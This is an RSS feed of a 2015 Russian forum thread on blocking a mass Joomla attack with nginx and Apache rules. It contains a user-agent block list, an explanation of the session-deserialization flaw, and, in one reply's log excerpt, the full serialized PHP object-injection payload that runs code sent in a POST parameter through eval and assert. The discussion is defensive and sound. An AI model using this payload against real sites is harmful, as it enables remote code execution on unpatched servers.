<?xml version="1.0" encoding="koi8-r"?>
<rss version="0.91">
<channel>
    <title>OpenForum RSS: Раздел полезных советов: Блокировка атаки на Joomla силами n...</title>
    <link>https://opennet.ru/openforum/vsluhforumID3/105980.html</link>
    <description>Продолжается &#091;&#091;https://www.opennet.ru/opennews/art.shtml?num=43521 массовая атака&#093;&#093; на сайты под управлением Joomla. К сожалению на базе данной CMS в сети много сайтов, администраторы которых не спешат устанавливать обновления. На системах хостинга можно попытаться блокировать типовую автоматизированную атаку централизованно, на стороне сервера.&lt;br&gt;&lt;br&gt;Для блокировки можно заблокировать обращение c User Agent &quot;JDatabaseDriverMysql&quot; и &quot;O:&quot;, а также запретить обращение c IP-адресов, с которых зафиксировано проведение атаки.&lt;br&gt;&lt;br&gt;Пример для nginx:&lt;br&gt;&lt;br&gt;   http &#123;&lt;br&gt;       map $http_user_agent $blocked_ua &#123;&lt;br&gt;           ~(?i)JDatabaseDriverMysql 1;&lt;br&gt;           ~(?i)O: 1;&lt;br&gt;           default 0;&lt;br&gt;       &#125;&lt;br&gt;       map $remote_addr $blocked_ip &#123;&lt;br&gt;          74.3.170.33 1;&lt;br&gt;          146.0.72.83 1;&lt;br&gt;          194.28.174.106 1;&lt;br&gt;          default 0;&lt;br&gt;       &#125;&lt;br&gt;       server &#123;&lt;br&gt;           listen 80;&lt;br&gt;           if ($blocked_ua) &#123; return 403; &#125;&lt;br&gt;           if ($blocked_ip) &#123; return 403; &#125;&lt;br&gt;           # ...&lt;br&gt;       &#125;&lt;br&gt;   &#125;&lt;br&gt;&lt;br&gt;&lt;br&gt;Приме</description>

<item>
    <title>Блокировка атаки на Joomla силами nginx и apache (ааааа)</title>
    <link>https://opennet.ru/openforum/vsluhforumID3/105980.html#17</link>
    <pubDate>Wed, 30 Dec 2015 17:02:39 GMT</pubDate>
    <description>произвольный код исполняется... вебшеллы не залили, лишних пользователей в джумлу не добавили - уже хорошо...&lt;br&gt;&lt;br&gt;====&lt;br&gt;В коде обработчика сессий Joomla пристутствует уязвимость, которая позволяет осуществить внедрение строки в синтаксис сериализованной сессии через HTTP-заголовки User-Agent и X-Forwarded-For. Эксплоит использует особенность MySQL при обработке utf8-символов из диапазона U+010000 &amp;#8212; U+10FFFF. При вставке строки, в конце которой присутствует такой символ, MySQL обрежет данные. Это позволяет сформировать и записать в таблицу сессий строку, в которой присутствуют пользовательские PHP-объекты, без нарушения синтаксиса. В ходе десериализации сессии атакующего вызываются деструкторы классов Joomla, что ведет к выполнению произвольного кода&amp;#8203;&lt;br&gt;====&lt;br&gt;</description>
</item>

<item>
    <title>Блокировка атаки на Joomla силами nginx и apache (анонимь)</title>
    <link>https://opennet.ru/openforum/vsluhforumID3/105980.html#16</link>
    <pubDate>Tue, 29 Dec 2015 12:46:14 GMT</pubDate>
    <description>Оналогично, дружище. Всё проверил, ничего не нашёл. Что делает эта строка, кто-нибудь может описать?&lt;br&gt;</description>
</item>

<item>
    <title>Блокировка атаки на Joomla силами nginx и apache (pavlinux)</title>
    <link>https://opennet.ru/openforum/vsluhforumID3/105980.html#15</link>
    <pubDate>Sat, 26 Dec 2015 23:08:28 GMT</pubDate>
    <description># ifdown eth0&lt;br&gt;sh: ifdown: Command not found &lt;br&gt;</description>
</item>

<item>
    <title>Блокировка атаки на Joomla силами nginx и apache (Аноним)</title>
    <link>https://opennet.ru/openforum/vsluhforumID3/105980.html#14</link>
    <pubDate>Thu, 24 Dec 2015 19:10:09 GMT</pubDate>
    <description># halt&lt;br&gt;</description>
</item>

<item>
    <title>Блокировка атаки на Joomla силами nginx и apache (ононимъ)</title>
    <link>https://opennet.ru/openforum/vsluhforumID3/105980.html#13</link>
    <pubDate>Tue, 22 Dec 2015 05:49:36 GMT</pubDate>
    <description>а всё таки, гуру просветлённые с недюжинным ч.ю., есть ответ? в логах следы есть, файлов изменённых в папке сайта нет. куда ещё копать, где проверить?&lt;br&gt;</description>
</item>

<item>
    <title>Блокировка атаки на Joomla силами nginx и apache (kleemhead)</title>
    <link>https://opennet.ru/openforum/vsluhforumID3/105980.html#12</link>
    <pubDate>Mon, 21 Dec 2015 19:58:08 GMT</pubDate>
    <description>&amp;gt;ifconfig eth0 down;&lt;br&gt;&lt;br&gt;ifdown eth0&lt;br&gt;</description>
</item>

<item>
    <title>Блокировка атаки на Joomla силами nginx и apache (kleemhead)</title>
    <link>https://opennet.ru/openforum/vsluhforumID3/105980.html#11</link>
    <pubDate>Mon, 21 Dec 2015 19:54:40 GMT</pubDate>
    <description>&amp;gt;ifconfig eth0 down; &lt;br&gt;&lt;br&gt;Для параноидального режима&lt;br&gt;&lt;br&gt;iptables -P INPUT DROP&lt;br&gt;&lt;br&gt;poweroff&lt;br&gt;</description>
</item>

<item>
    <title>Блокировка атаки на Joomla силами nginx и apache (pavlinux)</title>
    <link>https://opennet.ru/openforum/vsluhforumID3/105980.html#10</link>
    <pubDate>Mon, 21 Dec 2015 16:38:03 GMT</pubDate>
    <description>&amp;gt; весь интернет не заблокируешь&lt;br&gt;&lt;br&gt;ifconfig eth0 down; &lt;br&gt; &lt;br&gt;</description>
</item>

<item>
    <title>Блокировка атаки на Joomla силами nginx и apache (Slava)</title>
    <link>https://opennet.ru/openforum/vsluhforumID3/105980.html#9</link>
    <pubDate>Fri, 18 Dec 2015 10:58:07 GMT</pubDate>
    <description>строки в логе следующие:&lt;br&gt;&#092;x22JDatabaseDriverMysqli&#092;x22:3:&#123;s:2:&#092;x22fc&#092;x22;O:17:&#092;x22JSimplepieFactory&#092;x22:0:&#123;&#125;s:21:&#092;x22&#092;x5C0&#092;x5C0&#092;x5C0disconnectHandlers&#092;x22;a:1:&#123;i:0;a:2:&#123;i:0;O:9:&#092;x22SimplePie&#092;x22:5:&#123;s:8:&#092;x22sanitize&#092;x22;O:20:&#092;x22JDatabaseDriverMysql&#092;x22:0:&#123;&#125;s:8:&#092;x22feed_url&#092;x22;s:57:&#092;x22eval(base64_decode($_POST&#091;s&#093;));JFactory::getConfig();exit&#092;x22;s:19:&#092;x22cache_name_function&#092;x22;s:6:&#092;x22assert&#092;x22;s:5:&#092;x22cache&#092;x22;b:1;s:11:&#092;x22cache_class&#092;x22;O:20:&#092;x22JDatabaseDriverMysql&#092;x22:0:&#123;&#125;&#125;i:1;s:4:&#092;x22init&#092;x22;&#125;&#125;s:13:&#092;x22&#092;x5C0&#092;x5C0&#092;x5C0connection&#092;x22;b:1;&#125;&#092;xF0&#092;xFD&#092;xFD&#092;xFD&quot;&lt;br&gt;и&lt;br&gt;&#092;x22JDatabaseDriverMysqli&#092;x22:3:&#123;s:2:&#092;x22fc&#092;x22;O:17:&#092;x22JSimplepieFactory&#092;x22:0:&#123;&#125;s:21:&#092;x22&#092;x5C0&#092;x5C0&#092;x5C0disconnectHandlers&#092;x22;a:1:&#123;i:0;a:2:&#123;i:0;O:9:&#092;x22SimplePie&#092;x22:5:&#123;s:8:&#092;x22sanitize&#092;x22;O:20:&#092;x22JDatabaseDriverMysql&#092;x22:0:&#123;&#125;s:8:&#092;x22feed_url&#092;x22;s:102:&#092;x22eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST&#091;s&#093;))))));JFactory::getConfig();exit&#092;x22;s:19:&#092;x22cache_name_function&#092;x22;s:6:&#092;x22assert&#092;x22;s:5:&#092;x22cache&#092;x22;b:1;s:1</description>
</item>

</channel>
</rss>
